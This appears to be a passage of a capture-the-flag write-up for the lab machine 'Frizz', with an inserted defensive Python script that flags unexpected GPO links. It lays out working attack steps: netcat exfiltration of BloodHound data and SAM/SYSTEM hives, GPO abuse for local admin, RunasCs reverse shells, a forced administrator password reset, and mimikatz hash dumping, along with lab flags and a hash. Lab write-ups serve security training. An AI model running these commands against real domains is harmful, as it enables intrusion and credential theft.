2025-03-19T16:21:51.7889411-07:00|INFORMATION|Beginning LDAP search for frizz.htb
2025-03-19T16:21:51.9295762-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-03-19T16:21:51.9451868-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-03-19T16:22:22.3514306-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2025-03-19T16:22:35.9139333-07:00|INFORMATION|Consumers finished, closing output channel
2025-03-19T16:22:35.9608117-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-03-19T16:22:36.4920566-07:00|INFORMATION|Status: 112 objects finished (+112 2.545455)/s -- Using 43 MB RAM
2025-03-19T16:22:36.4920566-07:00|INFORMATION|Enumeration finished in 00:00:44.7062401
2025-03-19T16:22:36.8514312-07:00|INFORMATION|SharpHound Enumeration Completed at 4:22 PM on 3/19/2025! Happy Graphing!

frizz\f.frizzle@FRIZZDC C:\Temp>nc -w 3 10.10.14.109 4444 < "C:\Temp\20250319162234_frizzle.zip"

============================================

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 > frizzle.zip
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 56004

Privilege Escalation (Raising Privileges)

Now we obtain a TGT for the M.schoolbus user. If ssh does not work, the machine needs to be reset; there is always someone with itchy hands.

┌──(kali㉿kali)-[~/Downloads]
└─$ klist
klist: No credentials cache found (filename: M.schoolbus.ccache)

┌──(kali㉿kali)-[~/Downloads]
└─$ kinit M.schoolbus@FRIZZ.HTB
Password for M.schoolbus@FRIZZ.HTB:

┌──(kali㉿kali)-[~/Downloads]
└─$ klist
Ticket cache: FILE:M.schoolbus.ccache
Default principal: M.schoolbus@FRIZZ.HTB

Valid starting       Expires              Service principal
03/19/2025 20:35:04  03/20/2025 06:35:04  krbtgt/FRIZZ.HTB@FRIZZ.HTB
	renew until 03/20/2025 20:34:42

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh M.schoolbus@FRIZZ.HTB -K

PowerShell 7.4.5
PS C:\Users\M.SchoolBus>

We have write permission on a GPO.

https://github.com/antonioCoco/RunasCs/releases/tag/v1.5
RunasCs.exe

https://github.com/byronkg/SharpGPOAbuse/releases
SharpGPOAbuse.exe

We download both and upload them to Temp:

PS C:\> cd Temp
PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/SharpGPOAbuse.exe" -OutFile "C:\Temp\SharpGPOAbuse.exe"
PS C:\Temp> Invoke-WebRequest -Uri "http://10.10.14.109:8000/RunasCs.exe" -OutFile "C:\Temp\RunasCs.exe"
PS C:\Temp> dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---           3/19/2025  5:39 PM          51712 RunasCs.exe
-a---           3/19/2025  5:39 PM          80896 SharpGPOAbuse.exe

PS C:\Temp> New-GPO -Name evils | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId       : 6895da69-7b67-44a5-8150-f1219952e58a
DisplayName : evils
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\Temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName evils
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "evils" is: {6895DA69-7B67-44A5-8150-F1219952E58A}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{6895DA69-7B67-44A5-8150-F1219952E58A}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Temp> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.
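Added example, not part of this writeup: the step above is visible in the directory as a new entry in the gPLink attribute of OU=Domain Controllers, and a defender can catch it by comparing that attribute against the GPOs expected on that OU. The script parses the gPLink format (one [LDAP://cn={GUID},...;options] entry per linked GPO, where option bit 1 means the link is disabled and bit 2 means enforced) and reports enabled links that are not on an allowlist. The sample gPLink value is constructed to mirror the state after the "evils" GPO was linked; the Default Domain Controllers Policy GUID is the real well-known value, and the function names are this example's own.

```python
# Added example (not from the writeup): parse an OU's gPLink attribute and flag unexpected GPO links.
import re

# Well-known, fixed GUID of the Default Domain Controllers Policy.
DEFAULT_DC_POLICY = "{6AC1786C-016F-11D2-945F-00C04FB984F9}"

# Constructed gPLink value for OU=Domain Controllers after a second GPO was linked to it.
SAMPLE_GPLINK = (
    "[LDAP://cn={6AC1786C-016F-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=frizz,DC=htb;0]"
    "[LDAP://cn={6895DA69-7B67-44A5-8150-F1219952E58A},cn=policies,cn=system,DC=frizz,DC=htb;0]"
)

# One entry: [LDAP://cn={GUID},<rest of DN>;<options>]
LINK_RE = re.compile(r"\[LDAP://cn=(\{[0-9a-f-]{36}\}),[^;\]]*;(\d+)\]", re.IGNORECASE)


def parse_gplink(value):
    """Return one dict per linked GPO, in the order the entries appear in the attribute."""
    links = []
    for guid, opts in LINK_RE.findall(value or ""):
        o = int(opts)
        links.append({
            "guid": guid.upper(),
            "enabled": not (o & 1),    # bit 1 set => link disabled
            "enforced": bool(o & 2),   # bit 2 set => link enforced
        })
    return links


def unexpected_links(value, allowlist):
    """Enabled links whose GPO GUID is not in the allowlist of GPOs expected on that OU."""
    allowed = {g.upper() for g in allowlist}
    return [link for link in parse_gplink(value)
            if link["enabled"] and link["guid"] not in allowed]


if __name__ == "__main__":
    for link in unexpected_links(SAMPLE_GPLINK, [DEFAULT_DC_POLICY]):
        print("unexpected GPO linked to the Domain Controllers OU:", link["guid"])
```

Feed it the gPLink value read from the OU (for example with an LDAP query against the DC) and keep the allowlist in change control; a disabled link is deliberately left out of the report, since it applies nothing until someone enables it, at which point it shows up.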

Now we listen with netcat and run RunasCs.exe:

PS C:\Temp> .\RunasCs.exe M.SchoolBus !suBcig@MehTed!R cmd.exe -r 10.10.14.109:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-70b5c$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2396 created in background.
PS C:\Temp>
=======================================================

┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 56023
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>type c:\users\administrator\Desktop\root.txt
type c:\users\administrator\Desktop\root.txt
a1d4a462107bc2267d2af068b019e369694

C:\Users>type f.frizzle\Desktop\user.txt
type f.frizzle\Desktop\user.txt
4a279e844a63ab3a5f375ba3438da57969e

Logging in as Administrator and obtaining the hashes of the other users:

C:\Windows\system32>net user Administrator P@ssw0rd123
net user Administrator P@ssw0rd123
The command completed successfully.

PS C:\Temp> .\RunasCs.exe administrator P@ssw0rd123 cmd.exe -r 10.10.14.109:5555
======================================

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 50427
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
frizz\administrator

C:\Windows\system32>

C:\Temp>reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SAM C:\Temp\SAM
The operation completed successfully.

C:\Temp>reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
The operation completed successfully.

C:\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D129-C3DA

 Directory of C:\Temp

03/19/2025  06:38 PM    <DIR>          .
03/19/2025  06:30 PM         1,355,680 mimikatz.exe
03/19/2025  06:24 PM            51,712 RunasCs.exe
03/19/2025  06:37 PM            40,960 SAM
03/19/2025  06:24 PM            80,896 SharpGPOAbuse.exe
03/19/2025  06:38 PM        14,000,128 SYSTEM
               5 File(s)     15,529,376 bytes

C:\Temp>nc -w 3 10.10.14.109 4444 < SAM
nc -w 3 10.10.14.109 4444 < SAM

C:\Temp>nc -w 3 10.10.14.109 4444 < SYSTEM
nc -w 3 10.10.14.109 4444 < SYSTEM

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 > SAM
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 49580

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 > SYSTEM
listening on [any] 4444 ...
connect to [10.10.14.109] from (UNKNOWN) [10.10.11.60] 49582

C:\Temp>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::sam /system:C:\Temp\SYSTEM /sam:C:\Temp\SAM
Domain : FRIZZDC
SysKey : 02a7ae01010ecbfb70406e489a435ec7
Local SID : S-1-5-21-3873670720-2504411258-3912888090

SAMKey : 955b8e610ae76fc77ed8f9dc041048be

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: c299f8b2acc2da429d3a35953b3854d7

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
